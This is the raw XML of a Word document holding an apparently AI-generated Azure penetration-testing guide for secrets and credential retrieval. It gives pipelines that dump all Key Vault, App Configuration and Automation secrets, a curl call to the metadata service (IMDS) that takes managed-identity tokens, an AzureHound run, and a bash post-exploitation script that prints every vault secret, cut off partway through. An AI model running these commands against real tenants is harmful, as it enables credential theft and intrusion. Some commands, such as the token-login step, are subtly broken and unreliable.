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2951" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5670EABB" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E9EDC3" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc226381628"/>
      <w:r w:rsidRPr="004A2591">
        <w:t>Secrets and Credential Retrieval Techniques</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5D5325E8" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E22DD7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Here is a corrected, summarized, and rewritten version of the content, adapted for </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure penetration testing</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (instead of AWS), focusing on enumeration and retrieval of secrets, parameters, and credentials using similar techniques in the Azure ecosystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550574E9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01B07E8F">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D62E663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🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure PenTest: Secrets and Credential Retrieval Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662D3256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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Enumerate and Retrieve Azure Key Vault Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF10D4B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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Mass Secret Dumping from Multiple Key Vaults</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3097E059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az keyvault list --query "[].name" -o tsv | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D86719A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xargs -I {} az keyvault secret list --vault-name {} --query "[].id" -o tsv | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C0EE6C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xargs -I {} az keyvault secret show --id {} --query "value" -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39877808" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault list: Lists all Key Vaults in the current subscription.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1499BC" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault secret list: Lists secrets stored in each vault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5A7812" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault secret show: Retrieves the actual secret value from the secret ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBD1BE9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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Syntax-highlighted Output (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E49D86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az keyvault secret show --vault-name &lt;vault_name&gt; --name &lt;secret_name&gt; -o json | ccat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7BFC64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Replace ccat with your preferred syntax-highlighting tool (e.g., bat or jq).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588E5295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6AF3E5ED">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6702F831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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Enumerate and Retrieve Azure App Configuration Key-Values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F85660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az appconfig list --query "[].name" -o tsv | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D169445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xargs -I {} az appconfig kv list --name {} --query "[].{Key:key, Value:value}" -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642C40E" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az appconfig list: Lists all App Configuration instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A680E46" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az appconfig kv list: Retrieves key-value pairs from each configuration store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F86E51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29C894DC">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ACFFEE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🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Retrieve and Decrypt Azure Automation Variables (if RBAC allows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE31385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az automation variable list --automation-account-name &lt;account&gt; --resource-group &lt;rg&gt; -o json | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E70A8C9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jq -r '.[] | select(.encrypted == true) | .name' | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03080E33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xargs -I {} az automation variable show --name {} --automation-account-name &lt;account&gt; --resource-group &lt;rg&gt; --query "value" -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67157292" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Targets encrypted variables that may contain credentials or secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD94626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0F038BB9">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7664FAFD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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>4. Exploit Azure Instance Metadata Service (IMDS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFDBE4A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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Step 1: Query for Managed Identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1379D276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curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com&amp;api-version=2018-02-01"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438BA779" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Retrieves an access token for the VM's assigned managed identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA4A60C" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Use the token to authenticate with Azure CLI or REST APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A82F313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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Step 2: Use Access Token to Enumerate Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB3FC24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export AZURE_TOKEN=&lt;access_token&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDCBB8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az account get-access-token --access-token $AZURE_TOKEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1214258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az keyvault secret list --vault-name &lt;vault&gt; --query "[].id" -o tsv | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F192CD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xargs -I {} az keyvault secret show --id {} --query "value" -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339990A0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1613FCD8">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E0EE9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🧬</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Use AzureHound/BloodHound for Role Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9ED0BE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AzureHound can be used to enumerate principals, roles, Key Vault access policies, and privilege escalation paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBAE987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./AzureHound.exe -c All --token &lt;token&gt; --tenant &lt;tenant_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369DDE73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You can extract relevant object IDs and automate retrieval of Key Vault secrets using the Azure CLI or SDKs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616BA5BC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17D7ACA2">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C213D5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rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Optional Tools and Helpers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FB9DB" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CloudFuzzer Equivalent</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: No direct Azure equivalent for tools like cf s3ls or s3bucketbrute. However, Azure storage account name bruteforcing can be scripted via DNS or az storage account check-name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3009DA8E" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>IMDS-Helper Equivalent</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: IMDS access can be scripted with curl and custom tokens. Some tools like AZScanner, CloudSploit, and ScoutSuite can wrap around these.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051244D1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4806853D">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E6C77D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🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Summary: Key Azure Services to Target for Secrets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7"/>
        <w:gridCol w:w="2931"/>
        <w:gridCol w:w="3129"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C316C8" w:rsidRPr="004A2591" w14:paraId="3FC84629" w14:textId="77777777" w:rsidTr="001E6B7C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="387FDDC7" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A2591">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Azure Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C6BED31" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A2591">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Tool/Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="737738BB" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A2591">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C316C8" w:rsidRPr="004A2591" w14:paraId="28E863DD" w14:textId="77777777" w:rsidTr="001E6B7C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01385FDA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Key Vault</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AC1D036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az keyvault secret show</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="285D934B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Primary location for secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C316C8" w:rsidRPr="004A2591" w14:paraId="5EBA8561" w14:textId="77777777" w:rsidTr="001E6B7C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="764BD0ED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App Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="559B046A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az appconfig kv list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37053B23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Often used for app secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C316C8" w:rsidRPr="004A2591" w14:paraId="4BAEB5ED" w14:textId="77777777" w:rsidTr="001E6B7C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="349BC802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Automation Variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5754D289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az automation variable show</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C1DBB7E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May store service credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C316C8" w:rsidRPr="004A2591" w14:paraId="7A2A6CFF" w14:textId="77777777" w:rsidTr="001E6B7C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08862755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Instance Metadata Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D9FA061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curl to 169.254.169.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FD85B12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Fetch managed identity tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C316C8" w:rsidRPr="004A2591" w14:paraId="1D9ED860" w14:textId="77777777" w:rsidTr="001E6B7C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48A459F6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AzureHound + BloodHound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="641C1EC9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AzureHound.exe -c All</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25D5FEDB" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A2591">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>AD and RBAC enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71DF92EB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3D324C74">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29143C7B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Would you like a script to automate this entire secrets enumeration workflow for Azure VMs and Key Vaults?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0860FEF2" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C214F9A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Great — here's a full </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure secrets enumeration script</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> designed for use during a </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>post-exploitation or assessment phase</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> after gaining valid credentials or a token (e.g., via VM Managed Identity exploitation or Azure CLI access):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F77792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4DABC912">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B317D2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🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Secrets Enumeration Script (Bash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A5AFD3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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70571800" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5840BCF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# Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469F6C5C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# - Azure CLI logged in (or `AZURE_TOKEN` exported)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0CEA93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# - jq installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238FEB7C" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6349C50B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# Optional: use token if obtained from IMDS or elsewhere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20191E66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if [[ ! -z "$AZURE_TOKEN" ]]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAFFC01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echo "[*] Using access token from environment variable"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4063A11C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az account get-access-token --access-token "$AZURE_TOKEN" &gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492874A1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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300F2CF1" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513BD4F8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# Function: Dump Key Vault Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F660981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dump_keyvault_secrets() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08878AC9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echo "[+] Enumerating Key Vaults..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E3EA4E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for vault in $(az keyvault list --query "[].name" -o tsv); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA08F66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echo "  - Vault: $vault"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA0676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secrets=$(az keyvault secret list --vault-name "$vault" --query "[].name" -o tsv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C69E81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for secret in $secrets; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BB9933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value=$(az keyvault secret show --vault-name "$vault" --name "$secret" --query "value" -o tsv 2&gt;/dev/null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F1074D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echo "    [Secret] $secret =&gt; $value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B203A4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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35428F5C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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55827BA9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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CEE7ED" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A4274B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# Function: Dump App Config Key-Values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71844AED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dump_appconfig() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3B4866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echo "[+] Enumerating App Configurations..."</w:t>
